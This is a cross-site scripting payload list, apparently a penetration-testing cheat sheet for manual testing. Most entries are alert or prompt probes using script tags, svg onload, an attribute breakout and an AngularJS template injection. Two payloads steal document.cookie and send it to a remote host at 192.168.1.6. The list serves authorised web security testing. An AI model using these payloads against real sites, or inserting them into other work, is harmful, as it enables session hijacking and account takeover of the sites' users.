XSS
<script>alert(1)</script><Script>alert(1)</Script><sCript>alert(document.domain)</sCript><script>alert(123);</script><script>alert("test");</script><script>alert(document.cookie)</script></script><script>alert(document.cookie)</script>javascript:alert(document.cookie)javascript:prompt(document.cookie)'-alert(document.cookie)-'</script><svg onload=alert(document.cookie)>"onmouseover=alert(document.cookie)//{{$on.constructor('alert(1)')()}}<Script>alert(document.cookie)</Script><sCript>alert(document.domain)</sCript><script>alert(document.cookie);</script><script>alert(document.cookie);</script><script>alert(document.domain)</script><script>alert(document.cookie)</script><script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script><script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>XSS list for manual testing (main cases, high success rate).
xss to lfi payload -
Last updated